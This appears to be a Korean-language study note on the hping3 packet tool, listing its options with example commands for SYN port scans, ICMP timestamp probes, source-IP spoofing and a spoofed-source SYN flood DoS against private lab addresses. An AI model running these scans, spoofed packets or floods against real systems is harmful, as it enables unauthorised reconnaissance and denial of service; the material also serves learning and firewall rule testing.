[네트워크 해킹] hping3

hping3 CMD

- DoS/DDoS 공격에 사용된다. (Flooding Attack - Ping of Death)

- Scanning(Port Scan && Host Sweep)

- Flooding Attack(EX: Ping of Death)

- IP Spoofing -> 보안장비 Rule Test(F/W, IPS, UTM, ...)

 

형식

hping3 <공격모드> <소스 ip> <소스 포트> <목적지 ip> <목적지 포트> <빈도수>

 

옵션

-S  --syn       :  set SYN flag

-p  --destport <port> : destination port(default 0) ctrl+z inc/dec

-i  --interval  : wait (uX for X microseconds, for example -i u1000)

    --fast       : alias for -i u10000 (10 packets for second)

    --faster    : alias for -i u1000 (100 packets for second)

    --flood     : sent packets as fast as possible. Don't show replies.

-c : 요청 보낼 수

--rand-source : source IP 랜덤값 설정

-a <IP> : source IP 를 <IP>로 설정해서 보내기 (spoof)

 

<포트 스캐닝>

# hping3 -S 192.168.20.200 -p 80 -c 5

: 192.168.20.200 서버에게 80번 포트 tcp syn request 로 5번 스캐닝 시도

# hping3 -S 192.168.20.200 -p ++50 -c 5

: 192.168.20.200 서버에게 50~54포트 tcp syn request 로 스캐닝 시도

 # hpings -1 192.168.20.200 --icmp-ts -c 5

: (-1) ICMP를 사용하여 (--icmp-ts) 타임 스탬프를 함께 5번 요청한다.

# hping3 -8 50-56 -S 192.168.20.200 

: (-8) scan mode 로 (-S) tcp syn request 를 활용하여 50-56번 포트를 스캔한다.

 

<소스 주소 속이기>

# hping3 -1 192.168.20.200 -a 192.168.20.134 -c 3

: (-1) ICMP 를 사용하여 (-a) 소스 IP를 192.168.20.134로 설정하여 3개의 패킷을 보낸다.

 

<Dos 공격 예시>

# hping3 -S -a 192.168.20.205 192.168.20.200 -p 80 -c 3

# hping3 -S -a 192.168.20.205 192.168.20.200 -p 80 --flood